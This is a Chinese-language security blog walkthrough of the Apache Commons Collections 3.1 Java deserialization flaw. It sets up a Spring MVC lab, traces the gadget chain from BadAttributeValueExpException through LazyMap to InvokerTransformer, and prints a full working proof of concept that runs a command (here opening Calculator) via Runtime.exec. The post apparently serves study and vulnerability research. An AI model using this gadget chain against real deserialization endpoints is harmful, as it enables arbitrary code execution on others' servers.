Apache Commons Collections Deserialize Attack

2019-03-20

java web反序列化开坑之旅！

环境搭建

IDEA创建maven项目：

输入项目名：

继续next：

点击finish完成创建：

在src/main下创建java和resources两个文件夹。并且将resources文件夹设置为资源文件：

配置pom.xml文件，加载各个包（commons-collections 3.1存在漏洞）：

<properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    <maven.compiler.source>1.7</maven.compiler.source>
    <maven.compiler.target>1.7</maven.compiler.target>
    <springVersion>4.1.1.RELEASE</springVersion>
  </properties>

  <dependencies>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>4.11</version>
      <scope>test</scope>
    </dependency>

    <dependency>
      <groupId>org.springframework</groupId>
      <artifactId>spring-core</artifactId>
      <version>${springVersion}</version>
    </dependency>

    <dependency>
      <groupId>org.springframework</groupId>
      <artifactId>spring-beans</artifactId>
      <version>${springVersion}</version>
    </dependency>

    <dependency>
      <groupId>org.springframework</groupId>
      <artifactId>spring-context</artifactId>
      <version>${springVersion}</version>
    </dependency>

    <!--springMVC的两个包-->
    <dependency>
      <groupId>org.springframework</groupId>
      <artifactId>spring-web</artifactId>
      <version>${springVersion}</version>
    </dependency>

    <dependency>
      <groupId>org.springframework</groupId>
      <artifactId>spring-webmvc</artifactId>
      <version>${springVersion}</version>
    </dependency>

    <dependency>
      <groupId>javax.servlet.jsp.jstl</groupId>
      <artifactId>jstl-api</artifactId>
      <version>1.2</version>
    </dependency>

    <dependency>
      <groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId>
      <version>3.1</version>
    </dependency>
  </dependencies>

配置web.xml文件：

<!DOCTYPE web-app PUBLIC
        "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
        "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
    <display-name>Archetype Created Web Application</display-name>

    <context-param>
        <param-name>contextConfigLocation</param-name>
        <param-value>/WEB-INF/dispatcher-servlet.xml</param-value>
    </context-param>
    <listener>
        <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
    </listener>
    <servlet>
        <servlet-name>dispatcher</servlet-name>
        <servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>
        <load-on-startup>1</load-on-startup>
    </servlet>
    <servlet-mapping>
        <servlet-name>dispatcher</servlet-name>
        <url-pattern>/</url-pattern>
    </servlet-mapping>


</web-app>

在src/main/webapp/WEB-INF文件夹下创建views文件夹以及dispatcher-servlet.xml文件：

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xmlns:context="http://www.springframework.org/schema/context"
       xmlns:mvc="http://www.springframework.org/schema/mvc"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context.xsd http://www.springframework.org/schema/mvc http://www.springframework.org/schema/mvc/spring-mvc.xsd">

    <context:component-scan base-package="com.test"/>

    <context:annotation-config />
    <mvc:annotation-driven />
    <mvc:default-servlet-handler />

    <bean id="jspViewResolver"
          class="org.springframework.web.servlet.view.InternalResourceViewResolver">
        <property name="viewClass" value="org.springframework.web.servlet.view.JstlView"/>
        <property name="prefix" value="/WEB-INF/views/"/>
        <property name="suffix" value=".jsp"/>
    </bean>

</beans>

配置tomcat服务器：

部署war包以及路径：

创建home控制器：

在views下创建相应的jsp文件：

访问页面如下，搭建完毕：

漏洞分析

该漏洞的最终触发点在org/apache/commons/collections/functors/InvokerTransformer.java中的transform方法：

这里很明显利用java的反射机制执行input方法。如此一来，按照正常的漏洞挖掘思路，应该在当前包中进行全局搜索该方法，看看哪些地方用到，并且参数可控。

可以在org/apache/commons/collections/functors/ChainedTransformer.java中看到一个transform方法，遍历Transformer,调用每一个Transformer元素的transform方法。并且将每一个元素的返回对象传入下一个元素继续进行反射调用，也就是说我们可以利用这一点形成一个反射调用链。这里也用于解决Runtime实例化对象不允许进行序列化的问题。这时候就可以想到当Transformer元素为InvokerTransformer类的对象，那就可以调用InvokerTransformer类中的transform方法。至此我们可以继续向上回溯transform方法，得益于前辈们的分析我们可以直接定位到LazyMap类。

在LazyMap类中调用transform方法，但遗憾的是这里的get方法并不是类似php中的魔术方法，并不能直接进行调用，因此我们需要继续向上延长我们的pop链。并且这里的factory并不是我们直接可控的，而是需要通过LazyMap中的decorate方法对其进行一个赋值。

在org/apache/commons/collections/keyvalue/TiedMapEntry.java中存在getValue方法，在该方法中调用get方法，而getValue方法在同类的toString方法中被调用。java中的toString方法和php中的__toString方法相同，都是在对象被当作字符串进行操作时自动调用。顺着这条思路继续，我们接下来就应该寻找TiedMapEntry类被当作字符串的场景，或者说寻找存在某个对象调用toString方法。

在javax/management/BadAttributeValueExpException.java类中可以找到两处toString方法，一处在其构造方法中，另一处就是我所定位的为止。巧合的是，恰好在重写的readObject方法中调用了toString方法。而众所周知，readObject方法可以用于反序列化的触发。在这里我们符合System.getSecurityManager() == null这一表达式，这才导致toString方法的执行。至此完整的反序列化pop链已经呼之欲出。

BadAttributeValueExpException.readObject->
      TiedMapEntry.toString->
            TiedMapEntry.getValue->
                  LazyMap.get->
                        ChainedTransformer.transform->
                              InvokerTransformer.transform

在构造具体的POC时需要注意，在BadAttributeValueExpException类中我们需要控制val属性。其实不光光时这里，所有的pop链的构造其本质都是面向属性编程，换句话来说我们可以默认为对象属性可控。但是这里的val属性是私有属性，并不能直接访问赋值，因此我们需要用这种方法来保证属性的可控：

1
2
3

Field valfield = poc.getClass().getDeclaredField("val");
valfield.setAccessible(true);
valfield.set(poc, entry);

完整POC如下：

public class POC {
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[] {
                //传入Runtime类
                new ConstantTransformer(Runtime.class),
                //反射调用getMethod方法，然后getMethod方法再反射调用getRuntime方法，返回Runtime.getRuntime()方法
                new InvokerTransformer("getMethod",
                        new Class[] {String.class, Class[].class },
                        new Object[] {"getRuntime", new Class[0] }),
                //反射调用invoke方法，然后反射执行Runtime.getRuntime()方法，返回Runtime实例化对象
                new InvokerTransformer("invoke",
                        new Class[] {Object.class, Object[].class },
                        new Object[] {null, new Object[0] }),
                //反射调用exec方法
                new InvokerTransformer("exec",
                        new Class[] {String.class },
                        new Object[] {"open /Applications/Calculator.app/"})
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        BadAttributeValueExpException poc = new BadAttributeValueExpException(null);

        // val是私有变量，所以利用下面方法进行赋值
        Field valfield = poc.getClass().getDeclaredField("val");
        valfield.setAccessible(true);
        valfield.set(poc, entry);


        File f = new File("poc.txt");
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
        out.writeObject(poc);
        out.close();

        //从文件中反序列化obj对象
        FileInputStream fis = new FileInputStream("poc.txt");
        ObjectInputStream ois = new ObjectInputStream(fis);
        //恢复对象
        ois.readObject();
        ois.close();
    }
}

最后成功弹出计算器：

针对几个重要的类我这里再借用其他师傅的一些说明：

invokeTransformer

通过反射返回一个对象。
ChainedTransformer

构造一条Transformer链，将指定的transformers连接在一起。
ConstantTransformer

把一个对象转换为一个常量并返回。

首次接触java的反序列化，确实感受到其和php反序列化的不同之处，但也有其异曲同工之妙。初一上手还挺难理解不过在参考了诸多师傅的分析以后加上自己的调试渐渐摸到一些门路。有一点比较坑，就是IDEA会提前帮我们计算参数值，就导致可能还没有执行到具体命令执行的代码就产生代码执行，这里需要多理解一下。

参考链接：

https://p0sec.net/index.php/archives/121/

https://xz.aliyun.com/t/2028#toc-2

https://badcode.cc/2018/03/15/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8BCommons-Collections/